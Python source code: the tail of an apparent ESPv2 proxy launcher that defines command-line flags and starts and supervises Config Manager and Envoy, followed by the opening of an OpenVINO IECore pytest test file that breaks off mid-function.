        default=None,
        help='''
        The list of backend http status codes will be retried, in
        addition to the status codes enabled for retry through other retry
        policies set in `--backend_retry_ons`.
        The format is a comma-delimited String, like "501, 503".
        ''')
    parser.add_argument(
        '--backend_retry_num',
        default=None,
        help='''
        The allowed number of retries. Must be >= 0 and defaults to 1.
        ''')
    parser.add_argument(
        '--backend_per_try_timeout',
        default=None,
        help='''
        The backend timeout per retry attempt. Valid time units are "ns", "us",
        "ms", "s", "m", "h".
        Please note the `deadline` in the `x-google-backend` extension is the
        total time wait for a full response from one request, including all
        retries. If the flag is unspecified, ESPv2 will use the `deadline` in
        the `x-google-backend` extension. Consequently, a request that times out
        will not be retried as the total timeout budget would have been exhausted.
        ''')
    # Access logging flags.
    parser.add_argument(
        '--access_log',
        help='''
        Path to a local file to which the access log entries will be written.
        '''
    )
    parser.add_argument(
        '--access_log_format',
        help='''
        String format to specify the format of access log. If unset, the
        following format will be used.
        https://www.envoyproxy.io/docs/envoy/latest/configuration/observability/access_log#default-format-string
        For the detailed format grammar, please refer to the following document.
        https://www.envoyproxy.io/docs/envoy/latest/configuration/observability/access_log#format-strings
        '''
    )
    # Stackdriver tracing flags.
    parser.add_argument(
        '--disable_tracing',
        action='store_true',
        default=False,
        help='''
        Disable Stackdriver tracing. By default, tracing is enabled with 1 out
        of 1000 requests being sampled. This sampling rate can be changed with
        the --tracing_sample_rate flag.
        '''
    )
    parser.add_argument(
        '--tracing_project_id',
        default="",
        help="The Google project id for Stack driver tracing")
    parser.add_argument(
        '--tracing_sample_rate',
        help='''
        Tracing sampling rate from 0.0 to 1.0.
        By default, 1 out of 1000 requests are sampled.
        Cloud trace can still be enabled from request HTTP headers with
        trace context regardless this flag value.
        '''
    )
    parser.add_argument(
        '--disable_cloud_trace_auto_sampling',
        action='store_true',
        default=False,
        help="An alias to override --tracing_sample_rate to 0")
    parser.add_argument(
        '--tracing_incoming_context',
        default="",
        help='''
        Comma separated incoming trace contexts (traceparent|grpc-trace-bin|x-cloud-trace-context).
        Note the order matters. Default is 'traceparent,x-cloud-trace-context'.
        See official documentation for more details:
        https://cloud.google.com/endpoints/docs/openapi/tracing'''
    )
    parser.add_argument(
        '--tracing_outgoing_context',
        default="",
        help='''
        Comma separated outgoing trace contexts (traceparent|grpc-trace-bin|x-cloud-trace-context).
        Note the order matters. Default is 'traceparent,x-cloud-trace-context'.
        See official documentation for more details:
        https://cloud.google.com/endpoints/docs/openapi/tracing'''
    )
    parser.add_argument(
        '--cloud_trace_url_override',
        default="",
        help='''
        By default, traces will be sent to production Stackdriver Tracing.
        If this is non-empty, ESPv2 will send traces to this gRPC service instead.
        The url must be in gRPC format.
        https://github.com/grpc/grpc/blob/master/doc/naming.md
        The gRPC service must implement the cloud trace v2 RPCs.
        https://github.com/googleapis/googleapis/tree/master/google/devtools/cloudtrace/v2
        '''
    )
    parser.add_argument(
        '--non_gcp',
        action='store_true',
        default=False,
        help='''
        By default, the proxy tries to talk to GCP metadata server to get VM
        location in the first few requests. Setting this flag to true to skip
        this step.
        This will also disable the following features:
        - Backend authentication
        ''')
    parser.add_argument(
        '--service_account_key',
        help='''
        Use the service account key JSON file to access the service control and the
        service management. You can also set {creds_key} environment variable to
        the location of the service account credentials JSON file. If the option is
        omitted, the proxy contacts the metadata service to fetch an access token.
        '''.format(creds_key=GOOGLE_CREDS_KEY))
    parser.add_argument(
        '--dns_resolver_addresses',
        help='''
        The addresses of dns resolvers. Each address should be in format of
        IP_ADDR or IP_ADDR:PORT and they are separated by ';'. For the IP_ADDR
        case, the default DNS port 52 will be used. (e.g.,
        --dns_resolver_addresses=127.0.0.1;127.0.0.2;127.0.0.3:8000)
        If unset, will use the default resolver configured in /etc/resolv.conf.
        ''')
    parser.add_argument(
        '--backend_dns_lookup_family',
        default=None,
        choices=['auto', 'v4only', 'v6only'],
        help='''
        Define the dns lookup family for all backends. The options are "auto", "v4only" and "v6only". The default is "auto".
        ''')
    parser.add_argument('--enable_debug', action='store_true', default=False,
        help='''
        Enables a variety of debug features in both Config Manager and Envoy, such as:
        - Debug level per-request application logs in Envoy
        - Debug level service configuration logs in Config Manager
        - Debug HTTP response headers
        ''')
    # gRPC-JSON transcoding flags.
    parser.add_argument(
        '--transcoding_always_print_primitive_fields',
        action='store_true', help='''Whether to always print primitive fields
        for grpc-json transcoding. By default primitive fields with default
        values will be omitted in JSON output. For example, an int32 field set
        to 0 will be omitted. Setting this flag to true will override the
        default behavior and print primitive fields regardless of their values.
        Defaults to false
        ''')
    parser.add_argument(
        '--transcoding_always_print_enums_as_ints', action='store_true',
        help='''Whether to always print enums as ints for grpc-json transcoding.
        By default they are rendered as strings. Defaults to false.''')
    parser.add_argument(
        '--transcoding_preserve_proto_field_names', action='store_true',
        help='''Whether to preserve proto field names for grpc-json transcoding.
        By default protobuf will generate JSON field names using the json_name
        option, or lower camel case, in that order. Setting this flag will
        preserve the original field names. Defaults to false''')
    parser.add_argument(
        '--transcoding_ignore_query_parameters', action=None,
        help='''
        A list of query parameters(separated by comma) to be ignored for
        transcoding method mapping in grpc-json transcoding. By default, the
        transcoder filter will not transcode a request if there are any
        unknown/invalid query parameters.
        ''')
    parser.add_argument(
        '--transcoding_ignore_unknown_query_parameters', action='store_true',
        help='''
        Whether to ignore query parameters that cannot be mapped to a
        corresponding protobuf field in grpc-json transcoding. Use this if you
        cannot control the query parameters and do not know them beforehand.
        Otherwise use ignored_query_parameters. Defaults to false.
        ''')
    # Start Deprecated Flags Section
    parser.add_argument(
        '--enable_backend_routing',
        action='store_true',
        default=False,
        help='''
        ===
        DEPRECATED: This flag will automatically be enabled if needed, so it
        does NOT need to be set manually.
        ===
        Enable ESPv2 to route requests according to the
        "x-google-backend" or "backend" configuration
        ''')
    parser.add_argument(
        '--backend_protocol',
        default=None,
        help='''
        ===
        DEPRECATED: This flag will automatically be set based on the scheme
        specified in the --backend flag. Overrides are no longer needed.
        ===
        Backend Protocol. Overrides the protocol in --backend.
        Choices: [http1|http2|grpc].
        Default value: http1.''',
        choices=['http1', 'http2', 'grpc'])
    parser.add_argument('--http_port', default=None, type=int, help='''
        This flag is exactly same as --listener_port. It is added for
        backward compatible for ESPv1 and will be deprecated.
        Please use the flag --listener_port.''')
    parser.add_argument('--http2_port', default=None, type=int, help='''
        This flag is exactly same as --listener_port. It is added for
        backward compatible for ESPv1 and will be deprecated.
        Please use the flag --listener_port.''')
    parser.add_argument('--ssl_port', default=None, type=int, help='''
        This flag added for backward compatible for ESPv1 and will be deprecated.
        Please use the flags --listener_port and --ssl_server_cert_path instead.
        When configured, ESPv2 accepts HTTP/1.x and HTTP/2 secure connections on this port,
        Requires the certificate and key files /etc/nginx/ssl/nginx.crt and
        /etc/nginx/ssl/nginx.key''')
    parser.add_argument('--dns', help='''
        This flag is exactly same as --dns_resolver_addresses. This flag is added
        for backward compatible for ESPv1 and will be deprecated.
        Please use the flag --dns_resolver_addresses instead.''')
    parser.add_argument('-t', '--tls_mutual_auth', action='store_true', help='''
        This flag added for backward compatible for ESPv1 and will be deprecated.
        Please use the flag --ssl_backend_client_cert_path instead.
        Enable TLS mutual authentication for HTTPS backends.
        Default value: Not enabled. Please provide the certificate and key files
        /etc/nginx/ssl/backend.crt and /etc/nginx/ssl/backend.key.''')
    parser.add_argument('--ssl_protocols',
        default=None, action='append', help='''
        This flag added for backward compatible for ESPv1 and will be deprecated.
        Please use the flag --ssl_minimum_protocol and --ssl_maximum_protocol
        instead.
        Enable the specified SSL protocols. Please refer to
        https://nginx.org/en/docs/http/ngx_http_ssl_module.html#ssl_protocols.
        The "ssl_protocols" argument can be repeated multiple times to specify multiple
        SSL protocols (e.g., --ssl_protocols=TLSv1.1 --ssl_protocols=TLSv1.2).
        ''')
    parser.add_argument('--enable_grpc_backend_ssl',
        action='store_true', help='''
        This flag added for backward compatible for ESPv1 and will be deprecated.
        Enable SSL for gRPC backend. ESPv2 auto enables SSL if schema `grpcs` is
        detected.''')
    parser.add_argument('--grpc_backend_ssl_root_certs_file',
        default='/etc/nginx/trusted-ca-certificates.crt',
        help='''This flag added for backward compatible for ESPv1 and will be deprecated.
        ESPv2 uses `/etc/ssl/certs/ca-certificates.crt` by default.
        The file path for gRPC backend SSL root certificates.''')
    parser.add_argument('--ssl_client_cert_path', default=None, help='''
        This flag is renamed and deprecated for clarity.
        Use `--ssl_backend_client_cert_path` instead.''')
    parser.add_argument('--ssl_client_root_certs_file', default=None, help='''
        This flag is renamed and deprecated for clarity.
        Use `--ssl_backend_client_root_certs_file` instead.''')
    # End Deprecated Flags Section
    # Start internal flags section
    parser.add_argument(
        '--on_serverless',
        action='store_true',
        default=False,
        help='''
        When ESPv2 is started via the serverless image, this is true.
        ''')
    # End internal flags section
    return parser
# Check whether there are conflict flags. If so, return the error string.
# Otherwise returns None. This function also changes some default flag value.
def enforce_conflict_args(args):
    """Validate mutually-exclusive / deprecated flag combinations.

    Returns a human-readable error string for the first conflict found, or
    None when the flags are consistent.  Side effect: for non-GCP runs with
    no tracing project id, tracing is disabled by mutating args.
    """
    if args.rollout_strategy:
        if args.rollout_strategy != DEFAULT_ROLLOUT_STRATEGY:
            if args.version:
                return "Flag --version cannot be used together with -R or --rollout_strategy."
            if args.service_json_path:
                return "Flag -R or --rollout_strategy must be fixed with --service_json_path."
    if args.service_json_path:
        if args.service:
            return "Flag --service cannot be used together with --service_json_path."
        if args.version:
            return "Flag --version cannot be used together with --service_json_path."
    if args.non_gcp:
        # Outside GCP there is no metadata server, so credentials must be
        # supplied explicitly via flag or environment.
        if args.service_account_key is None and GOOGLE_CREDS_KEY not in os.environ:
            return "If --non_gcp is specified, --service_account_key has to be specified, or GOOGLE_APPLICATION_CREDENTIALS has to set in os.environ."
        if not args.tracing_project_id:
            # for non gcp case, disable tracing if tracing project id is not provided.
            args.disable_tracing = True
    if not args.access_log and args.access_log_format:
        return "Flag --access_log_format has to be used together with --access_log."
    if args.ssl_port and args.ssl_server_cert_path:
        return "Flag --ssl_port is going to be deprecated, please use --ssl_server_cert_path only."
    if args.tls_mutual_auth and (args.ssl_backend_client_cert_path or args.ssl_client_cert_path):
        return "Flag --tls_mutual_auth is going to be deprecated, please use --ssl_backend_client_cert_path only."
    if (args.ssl_backend_client_root_certs_file or args.ssl_client_root_certs_file) and args.enable_grpc_backend_ssl:
        # BUGFIX: grammar of the original message ("are" -> "is" for a single flag).
        return "Flag --enable_grpc_backend_ssl is going to be deprecated, please use --ssl_backend_client_root_certs_file only."
    if args.generate_self_signed_cert and args.ssl_server_cert_path:
        # BUGFIX: typo "simutaneously" -> "simultaneously".
        return "Flag --generate_self_signed_cert and --ssl_server_cert_path cannot be used simultaneously."
    # At most one of the (partially deprecated) port flags may be supplied.
    port_flags = []
    port_num = DEFAULT_LISTENER_PORT
    if args.http_port:
        port_flags.append("--http_port")
        port_num = args.http_port
    if args.http2_port:
        port_flags.append("--http2_port")
        port_num = args.http2_port
    if args.listener_port:
        port_flags.append("--listener_port")
        port_num = args.listener_port
    if args.ssl_port:
        port_flags.append("--ssl_port")
        port_num = args.ssl_port
    if len(port_flags) > 1:
        return "Multiple port flags {} are not allowed, use only the --listener_port flag".format(",".join(port_flags))
    elif port_num < 1024:
        return "Port {} is a privileged port. " \
               "For security purposes, the ESPv2 container cannot bind to it. " \
               "Use any port above 1024 instead.".format(port_num)
    if args.ssl_protocols and (args.ssl_minimum_protocol or args.ssl_maximum_protocol):
        return "Flag --ssl_protocols is going to be deprecated, please use --ssl_minimum_protocol and --ssl_maximum_protocol."
    if args.transcoding_ignore_query_parameters \
            and args.transcoding_ignore_unknown_query_parameters:
        return "Flag --transcoding_ignore_query_parameters cannot be used" \
               " together with --transcoding_ignore_unknown_query_parameters."
    if args.dns_resolver_addresses and args.dns:
        # BUGFIX: the original message repeated "together with" twice.
        return "Flag --dns_resolver_addresses cannot be used together with" \
               " --dns."
    if args.ssl_backend_client_cert_path and args.ssl_client_cert_path:
        return "Flag --ssl_client_cert_path is renamed to " \
               "--ssl_backend_client_cert_path, only use the latter flag."
    if args.ssl_backend_client_root_certs_file and args.ssl_client_root_certs_file:
        return "Flag --ssl_client_root_certs_file is renamed to " \
               "--ssl_backend_client_root_certs_file, only use the latter flag."
    return None
def gen_proxy_config(args):
    """Translate the parsed ESP CLI flags into the Config Manager argv list.

    Validates flag conflicts first (exiting the process with status 1 on
    error), then appends one Config Manager flag per recognized ESP flag.
    May generate a self-signed certificate on disk when
    --generate_self_signed_cert is set.  Returns the argv list suitable for
    subprocess.Popen.
    """
    check_conflict_result = enforce_conflict_args(args)
    if check_conflict_result:
        logging.error(check_conflict_result)
        sys.exit(1)
    proxy_conf = [
        CONFIGMANAGER_BIN,
        "--logtostderr",
        "--rollout_strategy", args.rollout_strategy,
    ]
    # Default to plain HTTP when the backend address carries no scheme.
    if "://" not in args.backend:
        proxy_conf.extend(["--backend_address", "http://" + args.backend])
    else:
        proxy_conf.extend(["--backend_address", args.backend])
    if args.healthz:
        proxy_conf.extend(["--healthz", args.healthz])
    if args.enable_debug:
        proxy_conf.extend(["--v", "1"])
    else:
        proxy_conf.extend(["--v", "0"])
    if args.envoy_xff_num_trusted_hops:
        proxy_conf.extend(["--envoy_xff_num_trusted_hops",
                           args.envoy_xff_num_trusted_hops])
    elif args.on_serverless:
        # Serverless platforms front the proxy with a known number of hops.
        proxy_conf.extend(["--envoy_xff_num_trusted_hops",
                           '{}'.format(SERVERLESS_XFF_NUM_TRUSTED_HOPS)])
    if args.disable_jwks_async_fetch:
        proxy_conf.append("--disable_jwks_async_fetch")
    if args.jwks_cache_duration_in_s:
        proxy_conf.extend(["--jwks_cache_duration_in_s", args.jwks_cache_duration_in_s])
    if args.jwks_fetch_num_retries:
        proxy_conf.extend(["--jwks_fetch_num_retries", args.jwks_fetch_num_retries])
    if args.jwks_fetch_retry_back_off_base_interval_ms:
        proxy_conf.extend(["--jwks_fetch_retry_back_off_base_interval_ms", args.jwks_fetch_retry_back_off_base_interval_ms])
    if args.jwks_fetch_retry_back_off_max_interval_ms:
        proxy_conf.extend(["--jwks_fetch_retry_back_off_max_interval_ms", args.jwks_fetch_retry_back_off_max_interval_ms])
    if args.management:
        proxy_conf.extend(["--service_management_url", args.management])
    if args.log_request_headers:
        proxy_conf.extend(["--log_request_headers", args.log_request_headers])
    if args.log_response_headers:
        proxy_conf.extend(["--log_response_headers", args.log_response_headers])
    if args.log_jwt_payloads:
        proxy_conf.extend(["--log_jwt_payloads", args.log_jwt_payloads])
    # All port flags map onto --listener_port; conflicting combinations were
    # rejected by enforce_conflict_args() above.
    if args.http_port:
        proxy_conf.extend(["--listener_port", str(args.http_port)])
    if args.http2_port:
        proxy_conf.extend(["--listener_port", str(args.http2_port)])
    if args.listener_port:
        proxy_conf.extend(["--listener_port", str(args.listener_port)])
    if args.ssl_server_cert_path:
        proxy_conf.extend(["--ssl_server_cert_path", str(args.ssl_server_cert_path)])
    if args.ssl_server_root_cert_path:
        proxy_conf.extend(["--ssl_server_root_cert_path", str(args.ssl_server_root_cert_path)])
    if args.ssl_port:
        # Deprecated ESPv1 flag: fixed nginx cert directory plus given port.
        proxy_conf.extend(["--ssl_server_cert_path", "/etc/nginx/ssl"])
        proxy_conf.extend(["--listener_port", str(args.ssl_port)])
    if args.ssl_backend_client_cert_path:
        proxy_conf.extend(["--ssl_backend_client_cert_path", str(args.ssl_backend_client_cert_path)])
    if args.ssl_client_cert_path:
        # Deprecated alias of --ssl_backend_client_cert_path.
        proxy_conf.extend(["--ssl_backend_client_cert_path", str(args.ssl_client_cert_path)])
    if args.enable_grpc_backend_ssl and args.grpc_backend_ssl_root_certs_file:
        proxy_conf.extend(["--ssl_backend_client_root_certs_path", str(args.grpc_backend_ssl_root_certs_file)])
    if args.ssl_backend_client_root_certs_file:
        proxy_conf.extend(["--ssl_backend_client_root_certs_path", str(args.ssl_backend_client_root_certs_file)])
    if args.ssl_client_root_certs_file:
        # Deprecated alias of --ssl_backend_client_root_certs_file.
        proxy_conf.extend(["--ssl_backend_client_root_certs_path", str(args.ssl_client_root_certs_file)])
    if args.ssl_server_cipher_suites:
        proxy_conf.extend(["--ssl_server_cipher_suites", str(args.ssl_server_cipher_suites)])
    if args.ssl_backend_client_cipher_suites:
        proxy_conf.extend(["--ssl_backend_client_cipher_suites", str(args.ssl_backend_client_cipher_suites)])
    if args.tls_mutual_auth:
        # Deprecated ESPv1 flag: implies client certs in the nginx directory.
        proxy_conf.extend(["--ssl_backend_client_cert_path", "/etc/nginx/ssl"])
    if args.ssl_minimum_protocol:
        proxy_conf.extend(["--ssl_minimum_protocol", args.ssl_minimum_protocol])
    if args.ssl_maximum_protocol:
        proxy_conf.extend(["--ssl_maximum_protocol", args.ssl_maximum_protocol])
    if args.ssl_protocols:
        # Deprecated repeated flag: the lexicographically smallest/largest
        # entries become the minimum/maximum protocol versions.
        args.ssl_protocols.sort()
        proxy_conf.extend(["--ssl_minimum_protocol", args.ssl_protocols[0]])
        proxy_conf.extend(["--ssl_maximum_protocol", args.ssl_protocols[-1]])
    if args.add_request_header:
        proxy_conf.extend(["--add_request_headers", ";".join(args.add_request_header)])
    if args.append_request_header:
        proxy_conf.extend(["--append_request_headers", ";".join(args.append_request_header)])
    if args.add_response_header:
        proxy_conf.extend(["--add_response_headers", ";".join(args.add_response_header)])
    if args.append_response_header:
        proxy_conf.extend(["--append_response_headers", ";".join(args.append_response_header)])
    if args.enable_operation_name_header:
        proxy_conf.append("--enable_operation_name_header")
    # Generate self-signed cert if needed
    if args.generate_self_signed_cert:
        if not os.path.exists("/tmp/ssl/endpoints"):
            os.makedirs("/tmp/ssl/endpoints")
        logging.info("Generating self-signed certificate...")
        os.system(("openssl req -x509 -newkey rsa:2048"
                   " -keyout /tmp/ssl/endpoints/server.key -nodes"
                   " -out /tmp/ssl/endpoints/server.crt"
                   ' -days 3650 -subj "/CN=localhost"'))
        proxy_conf.extend(["--ssl_server_cert_path", "/tmp/ssl/endpoints"])
    if args.enable_strict_transport_security:
        proxy_conf.append("--enable_strict_transport_security")
    if args.service:
        proxy_conf.extend(["--service", args.service])
    if args.http_request_timeout_s:
        proxy_conf.extend( ["--http_request_timeout_s", str(args.http_request_timeout_s)])
    if args.service_control_check_retries:
        proxy_conf.extend([
            "--service_control_check_retries",
            args.service_control_check_retries
        ])
    if args.service_control_quota_retries:
        proxy_conf.extend([
            "--service_control_quota_retries",
            args.service_control_quota_retries
        ])
    if args.service_control_report_retries:
        proxy_conf.extend([
            "--service_control_report_retries",
            args.service_control_report_retries
        ])
    if args.service_control_check_timeout_ms:
        proxy_conf.extend([
            "--service_control_check_timeout_ms",
            args.service_control_check_timeout_ms
        ])
    if args.service_control_quota_timeout_ms:
        proxy_conf.extend([
            "--service_control_quota_timeout_ms",
            args.service_control_quota_timeout_ms
        ])
    if args.service_control_report_timeout_ms:
        proxy_conf.extend([
            "--service_control_report_timeout_ms",
            args.service_control_report_timeout_ms
        ])
    # NOTE: It is true by default in configmangager's flags.
    if args.service_control_network_fail_policy == "close":
        proxy_conf.extend(["--service_control_network_fail_open=false"])
    if args.version:
        proxy_conf.extend(["--service_config_id", args.version])
    if args.service_json_path:
        proxy_conf.extend(["--service_json_path", args.service_json_path])
    if args.check_metadata:
        proxy_conf.append("--check_metadata")
    if args.underscores_in_headers:
        proxy_conf.append("--underscores_in_headers")
    if args.disable_normalize_path:
        proxy_conf.append("--normalize_path=false")
    if args.disable_merge_slashes_in_path:
        proxy_conf.append("--merge_slashes_in_path=false")
    if args.disallow_escaped_slashes_in_path:
        proxy_conf.append("--disallow_escaped_slashes_in_path")
    if args.backend_retry_ons:
        proxy_conf.extend(["--backend_retry_ons", args.backend_retry_ons])
    if args.backend_retry_on_status_codes:
        proxy_conf.extend(["--backend_retry_on_status_codes", args.backend_retry_on_status_codes])
    if args.backend_retry_num:
        proxy_conf.extend(["--backend_retry_num", args.backend_retry_num])
    if args.backend_per_try_timeout:
        proxy_conf.extend(["--backend_per_try_timeout", args.backend_per_try_timeout])
    if args.access_log:
        proxy_conf.extend(["--access_log",
                           args.access_log])
    if args.access_log_format:
        proxy_conf.extend(["--access_log_format",
                           args.access_log_format])
    # Tracing flags are only forwarded when tracing is enabled.
    if args.disable_tracing:
        proxy_conf.append("--disable_tracing")
    else:
        if args.tracing_project_id:
            proxy_conf.extend(["--tracing_project_id", args.tracing_project_id])
        if args.tracing_incoming_context:
            proxy_conf.extend(
                ["--tracing_incoming_context", args.tracing_incoming_context])
        if args.tracing_outgoing_context:
            proxy_conf.extend(
                ["--tracing_outgoing_context", args.tracing_outgoing_context])
        if args.cloud_trace_url_override:
            proxy_conf.extend(["--tracing_stackdriver_address",
                               args.cloud_trace_url_override])
        if args.disable_cloud_trace_auto_sampling:
            proxy_conf.extend(["--tracing_sample_rate", "0"])
        elif args.tracing_sample_rate:
            proxy_conf.extend(["--tracing_sample_rate",
                               str(args.tracing_sample_rate)])
    if args.transcoding_always_print_primitive_fields:
        proxy_conf.append("--transcoding_always_print_primitive_fields")
    if args.transcoding_always_print_enums_as_ints:
        proxy_conf.append("--transcoding_always_print_enums_as_ints")
    if args.transcoding_preserve_proto_field_names:
        proxy_conf.append("--transcoding_preserve_proto_field_names")
    if args.transcoding_ignore_query_parameters:
        proxy_conf.extend(["--transcoding_ignore_query_parameters",
                           args.transcoding_ignore_query_parameters])
    if args.transcoding_ignore_unknown_query_parameters:
        proxy_conf.append("--transcoding_ignore_unknown_query_parameters")
    if args.on_serverless:
        proxy_conf.extend([
            "--compute_platform_override", SERVERLESS_PLATFORM])
    if args.backend_dns_lookup_family:
        proxy_conf.extend(
            ["--backend_dns_lookup_family", args.backend_dns_lookup_family])
    if args.dns_resolver_addresses:
        proxy_conf.extend(
            ["--dns_resolver_addresses", args.dns_resolver_addresses])
    if args.dns:
        # Deprecated alias of --dns_resolver_addresses.
        proxy_conf.extend(
            ["--dns_resolver_addresses", args.dns]
        )
    if args.envoy_use_remote_address:
        proxy_conf.append("--envoy_use_remote_address")
    if args.cors_preset:
        proxy_conf.extend([
            "--cors_preset",
            args.cors_preset,
            "--cors_allow_origin",
            args.cors_allow_origin,
            "--cors_allow_origin_regex",
            args.cors_allow_origin_regex,
            "--cors_allow_methods",
            args.cors_allow_methods,
            "--cors_allow_headers",
            args.cors_allow_headers,
            "--cors_expose_headers",
            args.cors_expose_headers,
            "--cors_max_age",
            args.cors_max_age,
        ])
    if args.cors_allow_credentials:
        proxy_conf.append("--cors_allow_credentials")
    # Set credentials file from the environment variable
    if args.service_account_key is None and GOOGLE_CREDS_KEY in os.environ:
        args.service_account_key = os.environ[GOOGLE_CREDS_KEY]
    if args.service_account_key:
        proxy_conf.extend(["--service_account_key", args.service_account_key])
    if args.non_gcp:
        proxy_conf.append("--non_gcp")
    if args.enable_debug:
        proxy_conf.append("--suppress_envoy_headers=false")
    if args.envoy_connection_buffer_limit_bytes:
        proxy_conf.extend(["--connection_buffer_limit_bytes",
                           args.envoy_connection_buffer_limit_bytes])
    if args.enable_backend_address_override:
        proxy_conf.append("--enable_backend_address_override")
    return proxy_conf
def gen_envoy_args(args):
    """Build the Envoy argv list: binary, bootstrap config and log flags."""
    cmd = [ENVOY_BIN, "-c", DEFAULT_CONFIG_DIR + BOOTSTRAP_CONFIG,
           "--disable-hot-restart",
           # This will print logs in `glog` format.
           # Stackdriver logging integrates nicely with this format.
           "--log-format %L%m%d %T.%e %t envoy] [%t][%n]%v",
           "--log-format-escaped"]
    if args.enable_debug:
        # Enable debug logging, but not for everything... too noisy otherwise.
        # NOTE(review): flag and value are passed as a single argv element
        # ("-l debug") — confirm Envoy's CLI parser accepts this form.
        cmd.append("-l debug")
        cmd.append("--component-log-level upstream:info,main:info")
    return cmd
def output_reader(proc):
    """Pump a child process's stdout to our own stdout, one line at a time.

    Runs until the pipe reports EOF (an empty bytes read), which happens
    once the child exits and its write end of the pipe closes.
    """
    while True:
        raw_line = proc.stdout.readline()
        if not raw_line:
            break
        sys.stdout.write(raw_line.decode())
def start_config_manager(proxy_conf):
    """Launch Config Manager and stream its combined stdout/stderr.

    A helper thread keeps draining the child's pipe via output_reader() so
    the child never blocks on a full pipe buffer.  Returns the Popen handle.
    """
    print("Starting Config Manager with args: {}".format(proxy_conf))
    proc = subprocess.Popen(proxy_conf,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT)
    t = threading.Thread(target=output_reader, args=(proc,))
    t.start()
    return proc
def start_envoy(args):
    """Generate the Envoy bootstrap config, then launch Envoy.

    The bootstrap generator is run synchronously first; Envoy's combined
    stdout/stderr is then drained by a helper thread (see output_reader).
    Returns the Popen handle.
    """
    # Run the bootstrap generator to completion before Envoy reads its config.
    subprocess.call(gen_bootstrap_conf(args))
    cmd = gen_envoy_args(args)
    print("Starting Envoy with args: {}".format(cmd))
    proc = subprocess.Popen(cmd,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT)
    t = threading.Thread(target=output_reader, args=(proc,))
    t.start()
    return proc
if __name__ == '__main__':
    logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)
    parser = make_argparser()
    args = parser.parse_args()
    cm_proc = start_config_manager(gen_proxy_config(args))
    envoy_proc = start_envoy(args)
    # Supervise both children: if either dies, kill the sibling and exit
    # non-zero.
    while True:
        time.sleep(HEALTH_CHECK_PERIOD)
        # poll() returns the exit status once the child has terminated.
        # NOTE(review): a child that exits cleanly (status 0) makes poll()
        # return 0, which is falsy — such an exit is never detected here.
        if not cm_proc or cm_proc.poll():
            logging.fatal("Config Manager is down, killing all processes.")
            if envoy_proc:
                os.kill(envoy_proc.pid, signal.SIGKILL)
            sys.exit(1)
        if not envoy_proc or envoy_proc.poll():
            logging.fatal("Envoy is down, killing all processes.")
            if cm_proc:
                os.kill(cm_proc.pid, signal.SIGKILL)
            sys.exit(1)
|
test_IECore.py | # Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import pytest
import sys
from sys import platform
from pathlib import Path
from threading import Event, Thread
from time import sleep, time
from queue import Queue
from openvino.inference_engine import IENetwork, IECore, ExecutableNetwork
from tests_compatibility.conftest import model_path, plugins_path, model_onnx_path
import ngraph as ng
# Resolve test fixture locations once at import time.
test_net_xml, test_net_bin = model_path()
test_net_onnx = model_onnx_path()
plugins_xml, plugins_win_xml, plugins_osx_xml = plugins_path()
def test_init_ie_core_no_cfg():
    """IECore must be constructible without a plugins config."""
    ie = IECore()
    assert isinstance(ie, IECore)


def test_init_ie_core_with_cfg():
    """IECore must accept a plugins XML config path."""
    ie = IECore(plugins_xml)
    assert isinstance(ie, IECore)


def test_get_version(device):
    """get_versions() must return a per-device dict of version records."""
    ie = IECore()
    version = ie.get_versions(device)
    assert isinstance(version, dict), "Returned version must be a dictionary"
    assert device in version, "{} plugin version wasn't found in versions"
    assert hasattr(version[device], "major"), "Returned version has no field 'major'"
    assert hasattr(version[device], "minor"), "Returned version has no field 'minor'"
    assert hasattr(version[device], "description"), "Returned version has no field 'description'"
    assert hasattr(version[device], "build_number"), "Returned version has no field 'build_number'"
def test_load_network(device):
    """A read network loads onto the given device as an ExecutableNetwork."""
    ie = IECore()
    net = ie.read_network(model=test_net_xml, weights=test_net_bin)
    exec_net = ie.load_network(net, device)
    assert isinstance(exec_net, ExecutableNetwork)


def test_load_network_without_device():
    """load_network works when no device argument is supplied."""
    ie = IECore()
    net = ie.read_network(model=test_net_xml, weights=test_net_bin)
    exec_net = ie.load_network(net)
    assert isinstance(exec_net, ExecutableNetwork)


def test_load_network_from_file(device):
    """load_network accepts a model path instead of an IENetwork."""
    ie = IECore()
    exec_net = ie.load_network(test_net_xml, device)
    assert isinstance(exec_net, ExecutableNetwork)


def test_load_network_from_file_without_device():
    """load_network accepts a model path with no device argument."""
    ie = IECore()
    exec_net = ie.load_network(test_net_xml)
    assert isinstance(exec_net, ExecutableNetwork)


@pytest.mark.skipif(os.environ.get("TEST_DEVICE", "CPU") != "CPU", reason="Device independent test")
def test_load_network_wrong_device():
    """Loading onto an unregistered device name raises RuntimeError."""
    ie = IECore()
    net = ie.read_network(model=test_net_xml, weights=test_net_bin)
    with pytest.raises(RuntimeError) as e:
        ie.load_network(net, "BLA")
    assert 'Device with "BLA" name is not registered in the InferenceEngine' in str(e.value)
def test_query_network(device):
    """query_network maps every network layer to the queried device."""
    ie = IECore()
    net = ie.read_network(model=test_net_xml, weights=test_net_bin)
    query_res = ie.query_network(net, device)
    func_net = ng.function_from_cnn(net)
    ops_net = func_net.get_ordered_ops()
    ops_net_names = [op.friendly_name for op in ops_net]
    # Every op reported by query_network must exist in the ngraph function.
    assert [key for key in query_res.keys() if key not in ops_net_names] == [], \
        "Not all network layers present in query_network results"
    assert next(iter(set(query_res.values()))) == device, "Wrong device for some layers"
@pytest.mark.dynamic_library
@pytest.mark.skipif(os.environ.get("TEST_DEVICE", "CPU") != "CPU", reason="Device dependent test")
def test_register_plugin():
    """A plugin registered under a custom name can load networks."""
    ie = IECore()
    if ie.get_metric("CPU", "FULL_DEVICE_NAME") == "arm_compute::NEON":
        pytest.skip("Can't run on ARM plugin due-to ov_intel_cpu_plugin specific test")
    ie.register_plugin("ov_intel_cpu_plugin", "BLA")
    net = ie.read_network(model=test_net_xml, weights=test_net_bin)
    exec_net = ie.load_network(net, "BLA")
    assert isinstance(exec_net, ExecutableNetwork), "Cannot load the network to the registered plugin with name 'BLA'"


@pytest.mark.dynamic_library
@pytest.mark.skipif(os.environ.get("TEST_DEVICE", "CPU") != "CPU", reason="Device dependent test")
def test_register_plugins():
    """Plugins registered from a platform-specific XML can load networks."""
    ie = IECore()
    if ie.get_metric("CPU", "FULL_DEVICE_NAME") == "arm_compute::NEON":
